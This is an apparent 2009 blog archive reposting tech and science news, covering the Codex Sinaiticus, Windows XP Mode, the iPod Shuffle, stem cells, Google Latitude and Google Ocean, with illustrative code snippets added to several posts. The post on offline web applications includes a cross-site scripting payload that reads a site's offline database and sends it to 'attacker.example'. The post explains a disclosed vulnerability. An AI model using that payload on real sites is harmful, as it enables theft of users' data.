
Tuesday, July 7, 2009

Christian Bible Goes Digital



Time is never kind to paper manuscripts, particularly those written more than 1,600 years ago. Some 800 pages remain of the Codex Sinaiticus, a version of the Christian Bible written in the fourth century; the original text is thought to be nearly twice as long. Historians believe the book may be the world's oldest Christian Bible.

Thanks to today's online publication of the Codex Sinaiticus, scholars can examine the entire book from the comfort of their desks. Curious? You can explore the document yourself. Stephen Bates of The Guardian explains the significance of the online edition:
". . . so sophisticated is modern technology that scholars will not only be able to read the document on their screens using a standard light setting, but also separately by a raking illumination that highlights the texture and features of the very parchment on which the 800 surviving pages of text were written."
It's fair to say the online edition of Codex Sinaiticus won't have mainstream appeal. But the project does illustrate the power of the Internet to advance educational pursuits.

Monday, April 27, 2009

Microsoft is adding a "Windows XP Mode" to Windows 7


Now Windows 7 gets a built-in XP mode.
Microsoft is adding a "Windows XP Mode" to Windows 7, in a move to encourage users to make the switch to the software vendor's forthcoming operating system.

The firm has built XP Mode into Windows 7 using the Virtual PC technology Microsoft acquired in 2003, allowing the OS to run applications designed for Vista's predecessor.
Redmond was keen to emphasise in a blog post late on Friday that it hopes to woo small businesses to Windows 7 by talking up the XP Mode feature.

"Windows XP Mode is specifically designed to help small businesses move to Windows 7," said Microsoft. "Windows XP Mode provides you with the flexibility to run many older productivity applications on a Windows 7 based PC."

Users can install apps directly into the virtualised XP environment. The applications are then published to the Windows 7 desktop and they can be run from within that OS.

Microsoft said it will release a beta of Windows XP mode and Windows Virtual PC for Windows 7 Professional and Windows 7 Ultimate "soon" but wasn't more specific about when the test builds will land.

When Microsoft released Vista over two years ago, many businesses and individuals complained about compatibility snafus with applications that simply wouldn't work within the new OS.

Friday, March 13, 2009

Apple unveiled the new iPod Shuffle


Apple iPod Shuffle
Apple unveiled the new iPod Shuffle, which is only half the volume of the previous model, itself about the size of a quarter. The new one looks like a sleek aluminum tie clip, or maybe a slightly elongated stick of Trident gum; a AA battery hides it completely. There's just enough room on the back for a mirror-finish spring clip for fastening to your clothes. (If you order from apple.com, you can get a custom message laser-etched onto the clip.)
Apple's third-generation iPod Shuffle MP3 player ($79) is the smallest MP3 player you can buy. Its unique size and uncommon, remote-controlled design won't suit every purpose, but people looking for the next best thing to an invisible iPod will appreciate the player's minimal approach.

Design

At first glance, the iPod Shuffle looks almost like a practical joke--as if someone is trying to convince you that their tie clip plays MP3s. The aluminum-encased hardware measures just a few hairs larger than a paper clip (0.7 inch by 1.8 inches by 0.3 inch) and includes not a hint of button, knob, or screen. The headphone jack sits on the top edge of the Shuffle along with a switch that controls playback mode (shuffle playback/consecutive playback) and power.

Fortunately, Apple doesn't expect you to control the Shuffle's volume and playback using mind control (not yet, at least). The earbud-style headphones bundled with the Shuffle include a remote control on the cable, just below the right ear. The remote offers three buttons: two for volume control (up/down) and a central button with multiple functions. You press the center button once to pause music playback, twice to skip forward, and three times to skip back. Of course, the downside to this headphone-controlled design is that if you lose your headphones, you also lose control of your iPod. Apple's own replacement earbuds for the Shuffle run $29, but it's possible to grab third-party headphones and adapters for less.
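The multi-click scheme is easy to picture in code. Below is a minimal sketch of how such a click decoder could work; it is purely illustrative, and the 350 ms window, names, and structure are assumptions rather than anything Apple has published.

```typescript
// Illustrative sketch of a Shuffle-style remote: one click toggles
// pause, two clicks skip forward, three clicks skip back. The 350 ms
// window is an invented value, not Apple's actual firmware timing.

type PlayerAction = "togglePause" | "nextTrack" | "previousTrack";

class ClickDecoder {
  private clicks = 0;
  private timer: ReturnType<typeof setTimeout> | null = null;

  constructor(
    private onAction: (action: PlayerAction) => void,
    private windowMs = 350,
  ) {}

  // Call once per press of the center button.
  press(): void {
    this.clicks += 1;
    if (this.timer !== null) clearTimeout(this.timer);
    // Wait briefly for further clicks before committing to an action.
    this.timer = setTimeout(() => this.commit(), this.windowMs);
  }

  private commit(): void {
    const actions: Record<number, PlayerAction> = {
      1: "togglePause",
      2: "nextTrack",
      3: "previousTrack",
    };
    // Treat four or more rapid clicks the same as three.
    const action = actions[Math.min(this.clicks, 3)];
    this.clicks = 0;
    this.timer = null;
    if (action) this.onAction(action);
  }
}

// Usage:
const decoder = new ClickDecoder(action => console.log(action));
decoder.press(); // logs "togglePause" after the window elapses
```

The timeout is the key design choice: the player can't act on the first press immediately, because it has to wait long enough to tell a single click from the start of a double or triple click.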
The headphone cable reaches 3 feet, which should be more than enough length considering that the Shuffle is meant to be clipped to your clothing. A hinged chromed metal clip runs the length of the Shuffle on one side and includes a slot for attaching a lanyard or keychain. An Apple logo is engraved on the clip, and custom engraving is offered on orders placed through Apple's online store.

Features

The Shuffle is purely a digital audio player. There's no FM radio, no voice recording, and--obviously--no photo or video playback. Supported audio formats include MP3, AAC, Audible, WAV, AIFF, and Apple Lossless, but there's no support for WMA or FLAC.

The third-generation version of the iPod Shuffle offers a few new features over previous models, though. For one, this is the first Shuffle that tells you what you're listening to, which is no small accomplishment considering the player doesn't have a screen. The Shuffle uses a synthesized voice to announce artist and song title information whenever you hold the headphone clicker down. Apple is calling this feature VoiceOver and offers support for 14 languages, with voice quality hinging on what type of computer and operating system you're using.

Monday, March 2, 2009

Scientists develop safer alternative to embryonic stem cells


Scientists have developed what appears to be a safer way to create a promising alternative to embryonic stem cells, boosting hopes that such cells could sidestep the moral and political quagmire that has hindered the development of a new generation of cures.

The researchers produced the cells by using strands of genetic material, instead of potentially dangerous genetically engineered viruses, to coax skin cells into a state that appears biologically identical to embryonic stem cells.

"It's a leap forward in the safe application of these cells," said Andras Nagy of Mount Sinai Hospital in Toronto, who helped lead the international team of researchers that described the work in two papers being published online today by the journal Nature. "We expect this to have a massive impact on this field."

In addition to the scientific implications, the work comes at a politically sensitive moment. Scientists are anxiously waiting for President Obama to follow through on his promise to lift restrictions on federal funding for research on human embryonic stem cells. Critics of such a move immediately pointed to the work as the latest evidence that the alternative cells make such research unnecessary.

"Stem cell research that requires destroying embryos is going the way of the Model T," Richard M. Doerflinger of the U.S. Conference of Catholic Bishops said. "No administration that values science and medical progress over politics will want to divert funds now toward that increasingly obsolete and needlessly divisive approach."

Scientists, however, while praising the work as a potentially important advance, said it remains crucial to work on both types of cells because it is far from clear which will turn out to be more useful.

"The point is, we don't know yet what the end potential of either of these approaches will be," said Mark A. Kay of Stanford University. "No one has cured any disease in people with any of these approaches yet. We don't know enough yet to know which approach will be better."

Because embryonic stem cells are believed capable of becoming any kind of tissue in the body, scientists believe they could eventually lead to treatments or even cures for a host of ailments, including heart disease, diabetes, and Alzheimer's and Parkinson's diseases. In 2001, President George W. Bush restricted federal funding for human embryonic stem cell research to prevent taxpayer money from encouraging the destruction of human embryos, which is necessary to obtain the cells.

The alternative cells, known as induced pluripotent stem cells, or iPS cells, appear to have many of the same characteristics as embryonic stem cells but are produced by activating genes in adult cells to "reprogram" them into a more primitive state, bypassing the moral, political and ethical issues surrounding embryonic cells. Until now, however, their use has been limited because the genetic manipulation required the use of viruses, raising concerns the cells could cause cancer if placed in a patient. That has triggered a race to develop alternative approaches.

"These viral insertions are quite dangerous," Nagy said.

In the new work, Nagy and his colleagues in Toronto and at the University of Edinburgh in Scotland instead used a sequence of DNA known as a transposon, which can insert itself into the genetic machinery of a cell. In this case, the researchers used a transposon called "piggyBac" to carry four genes that can transform mouse and human embryonic skin cells into iPS cells. After the conversion took place, the researchers removed the added DNA from the transformed cells using a specific enzyme.

"PiggyBac carries the four genes into the cells and reprograms the cells into stem cells. After they have reprogrammed the cells, they are no longer required, and in fact they are dangerous," Nagy said. "After they do their job they can be removed seamlessly, with no trace left behind. The ability for seamless removal opens up a huge possibility."
A series of tests showed that the transformed cells had many of the properties of embryonic stem cells, Nagy said.

The researchers did their initial work on skin cells from embryos but say the approach should work just as efficiently in adult cells, and they plan to start those experiments.

"We do not expect that adult cells would behave significantly differently than the ones we are using currently," Nagy said.

In addition to producing safer cell lines that would be less likely to cause cancer in patients, the advance will enable many more scientists to begin working on such cells, because it requires none of the expertise or special laboratories needed for working with viruses, he said.

"This opens up the possibility of working in this field for laboratories that don't have viral labs attached to them. A much larger number of laboratories will be able to push this field forward," Nagy said.

Other researchers praised the work.

"It's very significant," said George Q. Daley, a stem cell researcher at Children's Hospital in Boston. "I think it's a major step forward in realizing the value of these cells for medical research."

"It's very exciting work," agreed Robert Lanza, a stem cell researcher at Advanced Cell Technology in Worcester, Mass. "With the new work, we're only a hair's breadth away from the biggest prize in regenerative medicine -- a way to create patient-specific cells that are safe enough to use clinically."

Kay agreed that the work is promising but cautioned that much more research will be needed to prove that cells produced this way are safe. Many scientists are working on other approaches that may turn out to be safer and more efficient, he said.

"This is a step forward. The research is heading in the right direction. But there still may be room for improvement," he said.

New Method For Creating Stem Cells
Mount Sinai Hospital's Dr. Andras Nagy discovered a new method of creating stem cells that could lead to possible cures for devastating diseases including spinal cord injury, macular degeneration, diabetes and Parkinson's disease. The study, published by Nature, accelerates stem cell technology and provides a road map for new clinical approaches to regenerative medicine.

Sunday, February 22, 2009

Offline web applications allow people to store data on their own computer


Working offline can come with an unexpected risk
A security expert has sounded a warning over features that allow offline access to websites, which let people use services like web-based e-mail when not online.
But sites with poor security that use the feature put their visitors at risk of being robbed of their data.

Michael Sutton disclosed the threat at the Black Hat security conference in Washington, DC.

Offline web applications are taking off because of services such as Gears, developed by Google, and HTML 5, a new HTML specification that is still in draft form.

The technology was introduced to many web users in January, when Gmail added a Gears-powered offline mode. Offline Gmail lets users read and write e-mail when they're not connected to the internet.

Mr Sutton stressed that Gmail, Gears and HTML 5 are considered secure, but websites that implement offline features without proper security could put users at risk.

"You can take this great, cool secure technology, but if you implement it on an insecure website, you're exposing it. And then all that security is for naught."

Mr Sutton found that websites which suffer from a well-known security vulnerability known as cross-site scripting are at risk.

A hacker could direct a victim to a vulnerable website and then cause the user's own browser to grab data from their offline database.
Unlike phishing, the whole attack could take place on a reputable site, which makes it harder to detect.
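To make the risk concrete, here is a hedged sketch of what such an attack could look like, assuming a Gears-style client-side SQL database on a site with a cross-site scripting hole. The database name, table, and attacker endpoint are all hypothetical, and the API surface is approximated rather than quoted from Gears' documentation.

```typescript
// Hedged sketch of an XSS attack on an offline store. The API below
// approximates a Gears-style client-side SQL database; the database
// name, table, and attacker endpoint are all hypothetical.

interface GearsResultSet {
  isValidRow(): boolean;
  field(index: number): unknown;
  next(): void;
  close(): void;
}

interface GearsDatabase {
  open(name: string): void;
  execute(sql: string): GearsResultSet;
}

// Assumed global provided by the Gears browser plugin.
declare const google: {
  gears: { factory: { create(name: string): GearsDatabase } };
};

// Payload injected through a cross-site scripting flaw. It executes in
// the vulnerable site's origin, so it can read what the site stored.
function stealOfflineData(): void {
  const db = google.gears.factory.create("beta.database");
  db.open("webmail-offline"); // hypothetical store created by the site
  const rows = db.execute("SELECT subject, body FROM cached_messages");
  const loot: unknown[][] = [];
  for (; rows.isValidRow(); rows.next()) {
    loot.push([rows.field(0), rows.field(1)]);
  }
  rows.close();
  // Exfiltrate to the attacker's server via an image request.
  new Image().src =
    "https://attacker.example/collect?d=" +
    encodeURIComponent(JSON.stringify(loot));
}
```

The essential point is that the injected script runs with the vulnerable site's origin, so the browser's same-origin policy, which normally walls off the offline store, offers no protection.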

As a proof of concept, Mr Sutton was able to swipe information from the offline version of a time-tracking website called Paymo. Mr Sutton alerted Paymo and it fixed the vulnerability immediately.

Web developers must ensure that their sites are secure before implementing offline applications, said Mr Sutton.

"Gears is fantastic and Google has done a great job of making it a secure technology. But if you slap that technology into an already vulnerable site, you're leaving your customers at risk," he explained.

Security expert Craig Balding agreed that it was up to developers to secure their sites, as the line between desktop applications and web applications becomes more blurred.

"Every website wants to keep up in terms of features, but when developers turn to technologies like this they need to understand the pros and cons," he told BBC News.

Tuesday, February 10, 2009

US Broadband Infrastructure Investments Necessitate Transparency

Broadband infrastructure investments planned as part of the economic stimulus package need transparency if they're to be effective.


Government investment in broadband networks has emerged as one of the more contentious parts of the economic stimulus legislation slated for a Senate vote Tuesday. Already, at least $2 billion of a planned $9 billion for broadband has apparently been cut from the latest bill, as legislators and interest groups squabble over who should control Internet communications funding, and under what rules.

What should be less controversial is that intelligent spending decisions about funding for high-speed Internet connections can't be made without excellent and transparent data about our broadband infrastructure.

The key public policy problem with broadband is that citizen-consumers and policy-makers still lack basic information. The Bush administration set a goal of achieving universal broadband by the end of 2007, then declared "mission accomplished" without providing much evidence to substantiate its claim. And under former Federal Communications Commission Chairman Kevin Martin, the agency refused to release what data it did have about competitors in the broadband marketplace.
President Obama's commitment to "change" has included a more hands-on approach to promoting broadband. Throughout the presidential campaign, and repeatedly since the election, Obama has emphasized the importance of "expanding broadband lines across America." With input from his telecommunications advisors, the House stimulus bill included $6 billion for broadband. Early versions of the Senate measure raised the total to $9 billion.
Statistics?
Equally important is Obama's commitment to empirically-driven policymaking. In January, Obama became only the second president—after William Howard Taft in 1909—to invoke "statistics" in an inaugural address, when he spoke of "the indicators of crisis, subject to data and statistics."

The US spends more than $8 billion a year on statistics. Much of that goes to fund the Census Bureau and data collection about agricultural and labor markets, such as the monthly unemployment report, which on Friday brought the grim news that the economy had shed 598,000 jobs in January. Last week, when the Agriculture Department released its own census, Agriculture Secretary Tom Vilsack reminded reporters: "Numbers and data are very important. They direct policy; they shape policy. They can tell us what we are doing right. They can tell us what we are doing wrong."
Yet almost none of this $8 billion in statistical spending goes to compiling information about broadband, the infrastructure of the knowledge-based economy. And the data that has been collected has often been presented in ways that mislead.
The FCC—the official record-keeper on private-sector telecommunications—for years claimed that there was adequate competition in broadband because the median ZIP code was served by eight separate providers. The Government Accountability Office's assessment of the same data found a median of two providers per ZIP code. Worse, the FCC refuses to release the information that it has about competition.
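The gap between eight and two comes down to how the underlying records are counted. A toy sketch of the median-providers-per-ZIP calculation, using invented coverage data, follows; note that a provider listed anywhere in a ZIP code counts once, even if it serves only a few households there, which is one reason a ZIP-level median can overstate real consumer choice.

```typescript
// Toy illustration (invented data) of "median providers per ZIP code",
// the statistic the FCC and the GAO read so differently.

function medianProvidersPerZip(coverage: Record<string, string[]>): number {
  // Count distinct providers in each ZIP, then take the median count.
  const counts = Object.values(coverage)
    .map(providers => new Set(providers).size)
    .sort((a, b) => a - b);
  const mid = Math.floor(counts.length / 2);
  return counts.length % 2 === 1
    ? counts[mid]
    : (counts[mid - 1] + counts[mid]) / 2;
}

// Hypothetical coverage records: ZIP code -> providers reported there.
console.log(
  medianProvidersPerZip({
    "20500": ["A", "B", "C", "D"], // dense urban ZIP
    "14607": ["A", "B"],
    "59001": ["A"], // rural ZIP with a single provider
  }),
); // -> 2
```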
A variety of organizations—including my own free web service, BroadbandCensus.com—have stepped in to do our best at collecting, compiling and releasing public broadband information. We believe that if you want to build a road, you need a map that tells you where existing roads lie before you begin taking construction bids, let alone start pouring concrete. Where will our nation's new broadband highways, by-ways and access points be built? Who's going to let the contracts? Who will own this infrastructure?
These questions can't be answered without detailed broadband data. To that end, I've supported a proposed "State Broadband Planning and Assessment Act," which could be introduced as an amendment to the fiscal stimulus measure. The goal of this effort, as of BroadbandCensus.com, is to unleash the Internet as a means of sharing information about the Internet itself.
For two-and-a-half years, I've been trying to get access to basic broadband data for the public, including citizen-consumers, businesses, and local policy-makers. I've been seeking to identify which carriers offer service in a particular ZIP code, as well as smaller units, like census blocks. In September 2006, when I headed a project at the Center for Public Integrity that investigated the telecommunications industry, we filed a Freedom of Information Act lawsuit against the FCC to force them to release basic broadband data about carriers by ZIP code.
The project obtained and displayed similar location information about broadcasters and cable operators from the FCC's cumbersome web site. But our attempts to get broadband data were thwarted by the FCC and by industry. AT&T, Verizon Communications, and the lobbying organizations representing the Bell companies, the cable companies, the cell phone carriers, and wireless broadband providers all asked the FCC to deny information to the public. Even though every consumer who buys broadband knows the name of the company that provides them with service, the telecoms argued that compiling this information into a single location would reveal "proprietary" data. The FCC agreed.



In its legal briefings, the FCC argued that releasing the data would lead to competition in communications—which was why it couldn't release the data! "Disclosure could allow competitors to free ride on the efforts of the first new entrant to identify areas where competition is more likely to be successful," the agency told the federal district court in Washington.

The once-vaunted virtue of competition in federal telecommunications policy—the underpinning of the 1996 Telecom Act—had taken a back seat to the privilege of supposedly proprietary information. The FCC did not want disclosure, and neither did the telecom incumbents and their lobbyists. They did not want successful broadband competition.
Congress was critical of the FCC's meager broadband statistics. In October it passed the Broadband Data Improvement Act to prod the agency to collect broadband data at a level more granular than the ZIP code. The FCC began doing just that in June, as the bill was working its way through Congress.
But under pressure from telecom lobbyists, Congress dropped a core provision from the House version of the bill: the requirement that a separate agency, the Commerce Department's National Telecommunications and Information Administration, take responsibility for conducting a national broadband census and producing a public map with the names of individual carriers and where they offered service.
The House version of the stimulus bill reintroduces the NTIA broadband map. But it takes out any mention of publicly releasing individual carrier names. Worse, the Broadband Data Improvement Act enshrined the business model favored by the carriers: providing information to an entity like Connected Nation, which agrees to excise the names of broadband providers from the maps they produce.
The House stimulus bill allocated $40 million to this business model. Last week's version of the Senate stimulus bill upped the total to $350 million.
President Obama has the opportunity to make broadband a priority in his administration by ensuring that the NTIA creates a public map of our national broadband providers and infrastructure. Map in hand, the Obama administration's broadband policy should be guided by three important principles:
1) Use the Internet to empower citizens and consumers.
With the FCC keeping broadband data out of the hands of the public, I started BroadbandCensus.com to publish the same information that any consumer can know: the name of their Internet service provider and type of broadband connection, how much they are charged for service, and the Internet speeds they are promised and actually delivered. The government of Ireland publishes exactly the same information on its communications ministry web page.
Some broadband data efforts focus on the needs of telecommunications carriers and their unionized employees. Based in Kentucky, Connected Nation has been promoting their state-wide maps of broadband availability as a means for providers to sell more service. The Communications Workers of America's Speed Matters campaign has collected random speed tests from Internet users to provide a snapshot about download and upload speeds. Both of these initiatives are good, so far as they go.
But to rigorously understand the condition of broadband, we can't rely only on the information provided by the carriers. It needs to be verified by Internet users. To truly unlock the power of Internet-enabled "crowdsourcing," an effective broadband strategy must focus on citizens. Empower them by releasing basic information and letting citizen-consumers add to the mash-up. It's about making citizens contributors as well as constituents.
2) Ensure that infrastructure investment is made on the basis of cost-benefit data.
In 1790, the United States was the first country to institute a periodic national census. What started as a questionnaire seeking only demographic information had broadened by 1840 to information about employment in mining, agriculture, manufacturing, and the "learned professions and engineers." Such information has enabled our government, our universities and our business sector to rely on good-quality statistical information.
We're going to need that kind of data, and a lot more of it, to make sound investment decisions about broadband. Because of our nation's agricultural origins, our statistical agencies provide far more data about crop production than they do about broadband availability, speeds, or prices. In the absence of good data, the temptation is to make public infrastructure investment decisions based on political pressure or lawmaker influence, rather than upon solid cost-benefit analyses.
3) Use the transparency of the Internet to regulate incumbents through public disclosure.
The regulatory philosophies of the New Deal—maximum and minimum wages and prices, hands-on federal regulation—have faded and are not likely to be revived even in the current crisis. Yet one Depression-era innovation of Franklin D. Roosevelt remains as valid as ever: the disclosure-based regime of the Securities and Exchange Commission.
The SEC is vigilant in requiring punctilious compliance with requirements that public companies disclose details of their operations. By and large, the SEC doesn't require substantive actions so much as it requires procedural compliance and full disclosure. Open information flows mean that poor corporate decisions are punished in the marketplace.
Equally important is the role that independent efforts, like those of BroadbandCensus.com and others, can play in collecting and aggregating public broadband data about speeds, prices, and reliability.
For more than a year, BroadbandCensus.com has provided a platform allowing Internet users to compare their actual broadband speeds against what they are promised by their carriers. We use the open-source Network Diagnostic Tool (NDT) of Internet2. All speed test data is publicly displayed under a Creative Commons license. This approach to publicly monitoring Internet traffic has recently been followed by Google and the New America Foundation with their "Measurement Lab" initiative, which also uses NDT.
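With invented numbers, the promised-versus-delivered comparison such a platform publishes boils down to something like this:

```typescript
// Hypothetical sketch of the comparison a broadband census publishes:
// the speed a carrier promises vs. the speed a test such as NDT measures.
// All numbers below are invented.

interface SpeedReport {
  isp: string;
  promisedMbps: number;
  measuredMbps: number;
}

function deliveredFraction(report: SpeedReport): number {
  return report.measuredMbps / report.promisedMbps;
}

const sample: SpeedReport = {
  isp: "ExampleNet", // hypothetical carrier
  promisedMbps: 10,
  measuredMbps: 6.2,
};

console.log(
  `${sample.isp} delivered ${(deliveredFraction(sample) * 100).toFixed(0)}% ` +
  `of its promised speed`,
); // -> "ExampleNet delivered 62% of its promised speed"
```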
Ultimately, broadband carriers that offer good speeds and good service will see the value in an objective and transparent broadband census. Fortunately, consumers don't need to wait on the carriers to begin collecting and publishing broadband data of their own.
Neither should the government. No matter how much Congress decides to allocate to stimulate broadband, it should insist that information about speeds, prices, technologies, and specific locations of high-speed Internet availability is publicly available to all.
Guiding principles for U.S. broadband infrastructure economic stimulus
As Congressional leaders and the incoming administration of U.S. President-elect Barack Obama mull economic stimulus legislation, a portion of which is expected to be devoted to telecommunications infrastructure to boost broadband Internet access, I offer these guiding principles:
1. The focus should be on the so-called "last mile" or local access network portion of the system. There's a broad consensus that the lack of adequate broadband access in the United States is due to technological shortcomings on this segment of the telecommunications infrastructure, its weakest link. The overall goal should be full build out of this currently incomplete but vital infrastructure to serve all residents and businesses.

Wednesday, February 4, 2009

Silicon chips used to repair damaged tissue in the human body

Computer chips may help repair nerves

Researchers have moved closer to creating silicon chips which could one day be used to repair damaged tissue in the human body.


Scientists at Edinburgh University have developed a technique which allows neurons to grow in fine, detailed patterns on the surface of tiny computer chips.


Neurons are the basic cells of the human nervous system.
The scientists said the development may eventually enable chips to replace damaged nerve or muscle fibres.
They also said it could be used in the development of prosthetics in the future.
During the chip manufacturing process, the scientists printed patterns on the smooth silicon surface.


The chip was then dipped in a patented mixture of proteins, and neurons grew along the patterns on the surface.
The technique also works with stem cells.
It is hoped the method will eventually enable any type of tissue to be grown on a tailor-made pathway and implanted as prosthetic tissue in the body.
Professor Alan Murray, head of Edinburgh University's School of Engineering and Electronics, who led the research, said: "This is a small but important step on the path towards the long-term goal of many scientists and medical experts - to develop surgical implants using silicon chips.
"We can now make silicon chips with circuitry as well as pathways where cells can grow in the body.
"One of the areas this could be used in is prosthetics - if we can cause cells from damaged tissues to grow where we want.
"It is going towards the realms of science fiction - there is a definite Incredible Hulk feel about it."
He added: "We also hope that, rather sooner than this, the technique will allow better methods of drug discovery and reduce the need for animal testing, as new medicines could be tested on chips rather than in live creatures."
The research was funded by the Engineering and Physical Sciences Research Council.

Tuesday, February 3, 2009

Do you know where your kid is right now? Check Google's maps


A screen grab showing Google's upgraded mapping system is seen in this photo provided by Google Inc. The new software, to be released Wednesday, Feb. 4, 2009, will enable people to use mobile phones and other wireless devices to automatically share their whereabouts with family and friends.
Recorded on Google Street View

When you follow the Street View scene (intermittently unavailable due to high demand) down Five Points Road in Rush, NY, you first see the deer run out in front of the vehicle and get hit; it can then be seen on the side of the road before the car pulls over, after which there is no more footage on Five Points Road. The sequence has also been captured on Gizmodo. Be warned that it's not the most pleasant viewing, as the deer is seen injured, lying on the ground. Maybe the photographer felt bad and couldn't take any more photos that day. One would think he would have held off on turning these in, too.

With an upgrade to its mobile maps, Google Inc. hopes to prove it can track people on the go as effectively as it searches for information on the Internet.
The new software to be released Wednesday will enable people with mobile phones and other wireless devices to automatically share their whereabouts with family and friends.
The feature, dubbed "Latitude," expands upon a tool introduced in 2007 to allow mobile phone users to check their own location on a Google map with the press of a button.
"This adds a social flavor to Google maps and makes it more fun," said Steve Lee, a Google product manager.
It could also raise privacy concerns, but Google is doing its best to avoid a backlash by requiring each user to manually turn on the tracking software and making it easy to turn off or limit access to the service.
Google also is promising not to retain any information about its users' movements. Only the last location picked up by the tracking service will be stored on Google's computers, Lee said.
The software plots a user's location — marked by a personal picture on Google's map — by relying on cell phone towers, global positioning systems or a Wi-Fi connection. The system can follow people's travels in the United States and 26 other countries.
It's left up to each user to decide who can monitor their location.
The social mapping approach is similar to a service already offered by Loopt Inc., a 3-year-old company located near Google's Mountain View headquarters.
Loopt's service already is compatible with more than 100 types of mobile phones.
To start out, Google Latitude will work on Research In Motion Ltd.'s BlackBerry and devices running on Symbian software or Microsoft Corp.'s Windows Mobile. It will also operate on some T-Mobile phones running on Google's Android software and eventually will work on Apple Inc.'s iPhone and iPod Touch.
To widen the software's appeal, Google is offering a version that can be installed on personal computers as well.
The PC access is designed for people who don't have a mobile phone but still may want to keep tabs on their children or someone else special, Lee said. People using the PC version can also be watched if they are connected to the Internet through Wi-Fi.
Google can plot a person's location within a few yards if it's using GPS, or might be off by several miles if it's relying on transmissions from cell phone towers. People who don't want to be precise about their whereabouts can choose to display just the city instead of a specific neighborhood.
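Purely as an illustration (Google has not published Latitude's internals), city-level sharing can be thought of as coarsening a precise fix before it leaves the device:

```typescript
// Illustrative sketch only -- Google has not published Latitude's
// internals. Shows the idea of degrading a precise fix to city-level
// granularity before sharing it with friends.

interface Fix {
  lat: number;
  lon: number;
  accuracyMeters: number; // e.g. ~10 m for GPS, thousands for cell towers
}

type Granularity = "exact" | "city";

function shareableLocation(fix: Fix, granularity: Granularity): Fix {
  if (granularity === "exact") return fix;
  // Snap to a coarse grid (~0.1 degree, roughly 11 km north-south) so
  // friends see only the general area, not the neighborhood.
  const snap = (v: number) => Math.round(v * 10) / 10;
  return { lat: snap(fix.lat), lon: snap(fix.lon), accuracyMeters: 11000 };
}

// Usage: a GPS fix shared at city granularity.
console.log(shareableLocation(
  { lat: 37.4219, lon: -122.084, accuracyMeters: 10 },
  "city",
)); // -> { lat: 37.4, lon: -122.1, accuracyMeters: 11000 }
```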
There are no current plans to sell any advertising alongside Google's tracking service, although analysts believe knowing a person's location eventually will unleash new marketing opportunities. Google has been investing heavily in the mobile market during the past two years in an attempt to make its services more useful to people when they're away from their office or home computers.

Success for MS stem-cell treatment

Not one of 21 adults with relapsing-remitting MS who had stem cells transplanted from their own bone marrow deteriorated over three years.
And 81% improved by at least one point on a scale of neurological disability, The Lancet Neurology reported.
Further tests are now planned, and a UK expert called the work "encouraging".
MS is an autoimmune disease which affects about 85,000 people in the UK.
It is caused by a defect in the body's immune system, which turns in on itself, causing damage to the nerves which can lead to symptoms including blurred vision, loss of balance and paralysis.

At first, the condition mostly causes intermittent symptoms that are partly reversible.
Over a 10-15 year period after onset, most patients develop secondary-progressive MS, with gradual but irreversible neurological impairment.
It is not the first time this treatment - known as autologous non-myeloablative haemopoietic stem-cell transplantation - has been tried in people with MS, but there has not been a great deal of success.
The researchers at Northwestern University School of Medicine in Chicago said most other studies had tried the transplants in people with secondary-progressive MS where the damage had already been done.
In the latest trial, patients with earlier-stage disease who, despite treatment, had had two relapses in the past year were offered the transplant.
Immune system
Stem cells were harvested from the patients and frozen while drugs were given to remove the immune cells or lymphocytes causing the damage.
The stem cells were then transplanted back to replenish the immune system - effectively resetting it.
Five patients in the study relapsed, but went into remission after receiving other therapy.
The researchers are now doing a randomised controlled trial in a larger number of patients to compare the treatment with standard therapy.
Study leader Professor Richard Burt said this was the first MS study of any treatment to show reversal of damage.
"You don't want to wait until the horse has left the barn before you close the barn door - you want to treat early.
"I think the reversal is the brain repairing itself.
"Once you're at the progressive stage you have exceeded the ability of the brain to repair itself," he said.
However, he cautioned that it was important to wait for the results of the larger trial.
And he said he would not call it a cure, but rather "changing the natural history of the disease".
Dr Doug Brown, research manager at the MS Society, said the results were very encouraging.
"It's exciting to see that in this trial not only is progression of disability halted, but damage appears to be reversed.
"Stem cells are showing more and more potential in the treatment of MS and the challenge we now face is proving their effectiveness in trials involving large numbers of people."

Google Earth goes underwater

Google Earth dives into the sea
Google dove into the sea on Monday by releasing an updated 3-D mapping service that lets users explore the ocean as if they were dolphins, swimming past submerged volcanoes and through underwater canyons.


Google Ocean expands Google Earth's map to include large swathes of the ocean floor and abyssal plain.
Users can dive beneath a dynamic water surface to explore the 3D sea floor terrain.
The map also includes 20 content layers, containing information from the world's leading scientists, researchers, and ocean explorers.

Al Gore was at the launch event in San Francisco which, Google hopes, will take its mapping software a step closer towards total coverage of the entire globe.
In a statement, Mr Gore said that the update would make Google Earth a "magical experience".
"You can not only zoom into whatever part of our planet's surface you wish to examine in closer detail, you can now dive into the world's ocean that covers almost three-quarters of the planet and discover new wonders that had not been accessible in previous versions".
Approximately 70% of the world's surface is covered by water, which contains nearly 80% of all life, yet less than 5% of it has actually been explored.
Google Ocean aims to let users visit some of the more interesting locations, including underwater volcanoes, as well as offering videos on marine life, shipwrecks and clips of favourite surf and dive spots.
The new features were developed in close collaboration with oceanographer Sylvia Earle and an advisory council of more than 25 ocean advocates and scientists.
Sylvia Earle, the National Geographic Society's explorer in residence, said the new features would bring the blue planet to life.
"I cannot imagine a more effective way to inspire awareness and caring for the blue heart of the planet than the new Ocean in Google Earth."
"For the first time, everyone from curious kids to serious researchers can see the world, the whole world, with new eyes," she added.
There are also updates on the terrestrial side, including GPS tracking, virtual time travel (where users can observe changes in satellite images, such as the 2006 World Cup stadium or the desertification of Africa's Lake Chad) and narrated tours of imagery and content in Google Earth. There are also updates to the Mars 3D section, so if users have had enough of the blue planet, they can always look at the red one.


The enhanced Google Earth, available for download at earth.google.com, offers everything from photographs and videos of sea life to models of shipwrecks to water temperature data collected from buoys. Dozens of partners - including the National Geographic Society, the National Oceanographic and Atmospheric Administration and the Scripps Oceanographic Institution - contributed information to the project, which is aimed at fostering learning, promoting conservation and, no doubt, increasing Google's popularity.
By plunging underwater, Google is adding a new dimension to Google Earth, which previously showcased only the terrestrial world. Premiered four years ago, it was probably best known as a tool for users to get a bird's-eye view of their homes and to peep into their neighbors' backyards.
The omission of the liquid two-thirds of the planet prompted Sylvia Earle, the former chief scientist at NOAA and noted oceanographer, to quip once that Google Earth should be renamed "Google dirt." On stage Monday at a Google kickoff event at San Francisco's California Academy of Sciences, she declared the enhanced version a "fantastic new rendition of the earth."
Google Earth lets you fly anywhere on Earth to view satellite imagery, maps, terrain, 3D buildings, from galaxies in outer space to the canyons of the ocean. You can explore rich geographical content, save your toured places, and share with others.

Monday, February 2, 2009

Scientists warm to Obama's environmental plan

